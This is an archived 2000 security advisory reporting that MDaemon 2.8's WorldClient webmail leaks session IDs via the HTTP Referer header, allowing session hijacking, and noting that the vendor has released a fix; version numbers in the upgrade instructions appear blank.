Session hijacking in Alt-N's MDaemon 2.8

Type securityvulns
Reporter Securityvulns
Modified 2000-08-10T00:00:00



Here's a bugreport and a fix for MDaemon 2.8.


It is possible to hijack an HTTP session from MDaemon / WorldClient Standard version 2.8


MDaemon 2.8 comes with WorldClient Standard which allows you to read your mail using a browser. When you receive an HTML formatted page and click on a link, WorldClient sends the session ID in the referrer field of the HTTP request. This ID can then be used to open the users mailbox from any other location.

Vendor status:

Contacted and a fix was released one day after reporting the problem (compliments to Alt-N!)


Download the fix for MDaemon 2.8 and upgrade to You will need MDaemon version to install this fix. - NT version - 9X version


Users of MDaemon version 3 should also upgrade to the latest version as this problem also existed in MDaemon 3. It was fixed a few months ago.

Jeroen Schipper

-- ::, Network Administrator :: Utrecht University, Center for Information Technology and Multimedia :: Office: KNG80, k2.09 / Phone/fax: +31(30) 253 6031 / 9191

Delivery co-sponsored by VeriSign - The Internet Trust Company

Upgrade your server security to 128-bit SSL encryption!

Get VeriSign's FREE guide, "Securing Your Web Site for Business." You will learn everything you need to know about using 128-bit SSL to encrypt your e-commerce transactions for serious online security. Click here!